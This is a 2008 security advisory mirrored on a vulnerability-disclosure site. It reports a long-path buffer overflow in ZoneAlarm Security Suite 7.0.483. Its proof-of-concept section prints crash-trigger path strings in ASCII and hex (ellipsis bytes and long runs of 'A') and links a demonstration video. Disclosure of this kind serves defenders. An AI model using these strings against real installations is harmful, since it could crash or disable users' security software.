Security Advisory: ZoneAlarm Security Suite buffer overflow

[EN] securityvulns.ru
no-pyccku

Related information
  ZoneAlarm Security Suite buffer overflow

From: jplopezy_(at)_gmail.com <jplopezy_(at)_gmail.com>
Date: 13.09.2008
Subject: ZoneAlarm Security Suite buffer overflow

Application: ZoneAlarm Security Suite
OS: Windows Xp (All patches a day)
------------------------------------------------------
1 - Description
2 - Vulnerability
3 - POC/EXPLOIT
------------------------------------------------------
Description

The zonealarm is a known firewall,
which in the version "security suite" brings some tools as an antivirus, antispam and so on.


Details of the version

ZoneAlarm Security Suite versiуn:7.0.483.000
Versiуn de TrueVector:7.0.483.000
Versiуn del controlador:7.0.483.000
Versiуn de motor anti-virus:3
Versiуn de motor antivirus:5.0.1.85
Versiуn de archivo DAT de firma de anti-virus 915051681
Versiуn de motor de protecciуn contra programas espнa:5.0.189.0
Versiуn de archivo DAT de firma de protecciуn contra programas espнa 01.200801.3195
Versiуn de AntiSpam 5.0.6.8903

------------------------------------------------------
Vulnerability

The vulnerability is caused because the program can not analyze very long paths.
This causes a buffer overflow with the possibility of execution of code.

The flaw could be exploited by malware to leave without protection to the system for instance.

------------------------------------------------------
POC/EXPLOIT


Here you can view a video proof of concept

http://www.fileden.com/files/2008/9/11/2091525/zonealarm.swf

Strings

ASCII: · … AAAAAAAAAAAAAAAAAAA · … AAAAAAAAAAAAAAAAAAA · … AAAAAAAAAAAAAAAAAAA · · … AAAAAAAAAAAAAAAAAAA · …
AAAAAAAAAAAAAAAAAAA · … AAAAAAAAAAAAAAAAAAA · · … A · … AAAAAAAAAAAAAAAAAAA · … AAAAAAAAAAAAAAAAAAA

HEX : b7 20 85 20 20 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 20 b7 20 85 20 20 41 41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41 41 41 20 b7 20 85 20 20 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 20 b7 20 b7 20 85
20 20 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 20 b7 20 85 20 20 41 41 41 41 41 41 41 41 41 41 41 41 41 41
41 41 41 41 41 20 b7 20 85 20 20 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 20 b7 20 b7 20 85 20 20 41 20 b7
20 85 20 20 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 20 b7 20 85 20 20 41 41 41 41 41 41 41 41 41 41 41 41
41 41 41 41 41 41 41

ASCII:
……………………………AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA…………AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
A

HEX: 85 85 85 85 85 85 85 85 85 85 85 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
41 41 85 85 85 85 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41

------------------------------------------------------
Juan Pablo Lopez Yacubian

test server